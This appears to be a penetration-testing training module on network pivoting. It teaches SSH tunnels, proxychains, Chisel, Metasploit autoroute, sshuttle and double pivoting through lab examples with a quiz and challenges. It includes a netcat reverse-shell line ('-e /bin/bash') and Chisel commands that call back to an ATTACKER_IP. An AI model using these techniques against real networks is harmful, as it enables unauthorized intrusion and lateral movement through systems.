Network Pivoting

advanced40 minWriteup

Moving laterally through compromised networks

Learning Objectives

  • Understand pivoting concepts
  • Set up SSH tunnels
  • Use proxychains
  • Pivot through Metasploit

You've compromised a machine, but the juicy targets are on internal networks you can't reach directly. Pivoting (also called "tunneling" or "lateral movement") lets you use compromised hosts as stepping stones to reach otherwise inaccessible systems.

Think of it like this: you've broken into the lobby of a building. The vault is in the basement, accessible only from inside. Pivoting lets you use that lobby computer to access the basement network.

Why Pivot?

Internal networks are often more trusted and less defended than perimeter systems. Once inside, pivoting lets you reach databases, domain controllers, and sensitive systems that aren't exposed to the internet.

Pivoting Concepts

  • Pivot Host: The compromised machine you route through
  • Local Port Forward: Access remote services via local port
  • Remote Port Forward: Expose your services on remote host
  • Dynamic Port Forward: SOCKS proxy for all traffic
  • Double Pivot: Chain through multiple hosts
1606070;"># Network Topology Example
2[Attacker]                    [Target Network]
3192.168.1.5  -->  [Pivot Host]  -->  10.0.0.0/24
4                  192.168.1.10       (Internal only)
5                  10.0.0.1
6 
7606070;"># Without pivoting: Can't reach 10.0.0.x
8606070;"># With pivoting: Route through pivot host to reach 10.0.0.x

SSH Tunneling

is the most common pivoting method. If you have SSH access to the pivot host, you can tunnel almost anything through it.

Local Port Forwarding

"Bring remote port to me" - Access internal services locally.

bash
1606070;"># Access internal web server (10.0.0.5:80) via localhost:8080
2ssh -L 8080:10.0.0.5:80 user@pivot_host
3 
4606070;"># Access internal RDP (10.0.0.10:3389)
5ssh -L 3389:10.0.0.10:3389 user@pivot_host
6606070;"># Then: rdesktop localhost
7 
8606070;"># Access internal MySQL
9ssh -L 3306:10.0.0.20:3306 user@pivot_host
10606070;"># Then: mysql -h 127.0.0.1 -u root -p
11 
12606070;"># Multiple forwards in one command
13ssh -L 8080:10.0.0.5:80 -L 3389:10.0.0.10:3389 user@pivot_host

Dynamic Port Forwarding (SOCKS)

Create a SOCKS proxy for flexible routing.

bash
1606070;"># Create SOCKS proxy on local port 1080
2ssh -D 1080 user@pivot_host
3 
4606070;"># Use with proxychains
5echo 606070;">#a5d6ff;">"socks4 127.0.0.1 1080" >> /etc/proxychains.conf
6proxychains nmap -sT 10.0.0.0/24
7proxychains curl http:606070;">//10.0.0.5
8 
9606070;"># Use with browser
10606070;"># Set Firefox SOCKS proxy: 127.0.0.1:1080
11 
12606070;"># Background the tunnel
13ssh -D 1080 -f -N user@pivot_host
14606070;"># -f = background, -N = no commands

Remote Port Forwarding

"Send my port there" - Expose your services through pivot.

bash
1606070;"># Make your local port 4444 accessible on pivot as port 4444
2ssh -R 4444:localhost:4444 user@pivot_host
3 
4606070;"># Useful for reverse shells from internal network
5606070;"># 1. Set up listener on your machine: nc -lvnp 4444
6606070;"># 2. Create tunnel: ssh -R 4444:localhost:4444 user@pivot_host
7606070;"># 3. From internal host: nc pivot_host 4444 -e /bin/bash

SSH Config for Persistence

Add tunnels to ~/.ssh/config for easy reuse:

Host pivot
  HostName 192.168.1.10
  User admin
  DynamicForward 1080
  LocalForward 8080 10.0.0.5:80

Proxychains

Proxychains forces any TCP connection through your proxy. Essential for using tools that don't have native proxy support.

bash
1606070;"># Configure /etc/proxychains.conf
2606070;"># Add at the end:
3socks4 127.0.0.1 1080
4 
5606070;"># Or for multiple proxies (chain):
6socks4 127.0.0.1 1080
7socks4 127.0.0.1 1081
8 
9606070;"># Use with any tool
10proxychains nmap -sT -Pn 10.0.0.5
11proxychains curl http:606070;">//10.0.0.5
12proxychains ssh user@10.0.0.5
13proxychains msfconsole
14 
15606070;"># For faster scanning
16proxychains -q nmap -sT 10.0.0.0/24
17 
18606070;"># Note: Only TCP works through SOCKS
19606070;"># No ICMP (ping), no UDP by default

Proxychains Limitations

Proxychains only works with dynamically linked programs and TCP. Nmap SYN scans (-sS) won't work - use TCP connect (-sT). Ping won't work - use -Pn to skip host discovery.

Chisel

Chisel is a fast TCP tunnel over HTTP. Perfect when SSH isn't available but HTTP traffic is allowed.

bash
1606070;"># On attacker (server mode)
2./chisel server -p 8080 --reverse
3 
4606070;"># On pivot host (client mode)
5./chisel client ATTACKER_IP:8080 R:socks
6 
7606070;"># This creates a SOCKS proxy on attacker:1080
8606070;"># Use with proxychains same as SSH
9 
10606070;"># Port forward
11./chisel client ATTACKER_IP:8080 R:8888:10.0.0.5:80
12 
13606070;"># Access internal web: curl localhost:8888

Metasploit Pivoting

bash
1606070;"># From meterpreter session
2meterpreter > run autoroute -s 10.0.0.0/24
3 
4606070;"># Or manually
5meterpreter > run post/multi/manage/autoroute SUBNET=10.0.0.0 NETMASK=255.255.255.0
6 
7606070;"># Check routes
8meterpreter > run autoroute -p
9 
10606070;"># Now Metasploit can reach 10.0.0.x network
11msf > use auxiliary/scanner/portscan/tcp
12msf > set RHOSTS 10.0.0.0/24
13msf > run
14 
15606070;"># Create SOCKS proxy for external tools
16msf > use auxiliary/server/socks_proxy
17msf > set SRVPORT 1080
18msf > run -j
19 
20606070;"># Then use proxychains with socks4 127.0.0.1 1080

Meterpreter Port Forward

bash
1606070;"># Forward local port to internal host
2meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.5
3 
4606070;"># List forwards
5meterpreter > portfwd list
6 
7606070;"># Remove forward
8meterpreter > portfwd delete -l 8080 -p 80 -r 10.0.0.5

sshuttle

sshuttle creates a VPN-like connection over SSH. Easier than setting up tunnels for each port.

bash
1606070;"># Route all traffic to 10.0.0.0/24 through pivot
2sshuttle -r user@pivot_host 10.0.0.0/24
3 
4606070;"># Multiple subnets
5sshuttle -r user@pivot_host 10.0.0.0/24 10.1.0.0/24
6 
7606070;"># Route everything except local network
8sshuttle -r user@pivot_host 0/0 -x 192.168.1.0/24
9 
10606070;"># With specific SSH key
11sshuttle -r user@pivot_host 10.0.0.0/24 --ssh-cmd 606070;">#a5d6ff;">"ssh -i /path/to/key"

sshuttle is Magic

Unlike SOCKS proxies, sshuttle creates real routing rules. Tools work normally without proxychains. ICMP (ping) even works!

Double Pivoting

Sometimes you need to go through multiple hosts to reach your target. Chain proxies to extend your reach.

bash
1606070;"># Scenario:
2606070;"># Attacker -> Pivot1 (192.168.1.10) -> Pivot2 (10.0.0.5) -> Target (172.16.0.0/24)
3 
4606070;"># Step 1: SOCKS proxy through Pivot1
5ssh -D 1080 user@192.168.1.10
6 
7606070;"># Step 2: Use proxychains to SSH to Pivot2 and create second proxy
8proxychains ssh -D 1081 user@10.0.0.5
9 
10606070;"># Step 3: Configure proxychains for double hop
11606070;"># /etc/proxychains.conf:
12606070;"># socks4 127.0.0.1 1080
13606070;"># socks4 127.0.0.1 1081
14 
15606070;"># Now: proxychains curl http://172.16.0.10

Windows Pivoting

bash
1606070;"># Using netsh (built-in)
2netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.0.0.5
3 
4606070;"># Using plink (PuTTY command line)
5plink.exe -ssh -L 8080:10.0.0.5:80 user@pivot_host
6plink.exe -ssh -D 1080 user@pivot_host
7 
8606070;"># Using chisel
9chisel.exe client ATTACKER_IP:8080 R:socks

Pivoting Methodology

Pivoting Process

1
Network ReconIdentify internal subnets from compromised host
2
Choose MethodSSH if available, Chisel for HTTP, Metasploit if session exists
3
Establish TunnelCreate SOCKS proxy or port forwards
4
Configure ToolsSet up proxychains or native proxy settings
5
Scan InternalDiscover internal hosts and services
6
Exploit InternalAttack internal targets through pivot
7
Extend AccessCompromise additional hosts for further pivoting

Knowledge Check

Quick Quiz
Question 1 of 3

What is the purpose of dynamic port forwarding (-D)?

Challenges

Basic Pivot

Challenge
🔥 intermediate

From a compromised web server, access an internal database server (MySQL) that's only accessible from the web server's network.

Need a hint? (4 available)

Double Hop

Challenge
💀 advanced

Access a target three networks deep: Internet -> DMZ -> Internal -> Secure. Set up tunnels to reach the secure network.

Need a hint? (4 available)

Key Takeaways

  • Pivoting routes traffic through compromised hosts to reach internal networks
  • SSH dynamic forwarding (-D) creates a versatile SOCKS proxy
  • Proxychains forces TCP connections through your proxy
  • sshuttle creates VPN-like routing over SSH
  • Chisel works over HTTP when SSH isn't available
  • Metasploit's autoroute enables routing through Meterpreter sessions
  • Double pivoting chains tunnels to reach deeply nested networks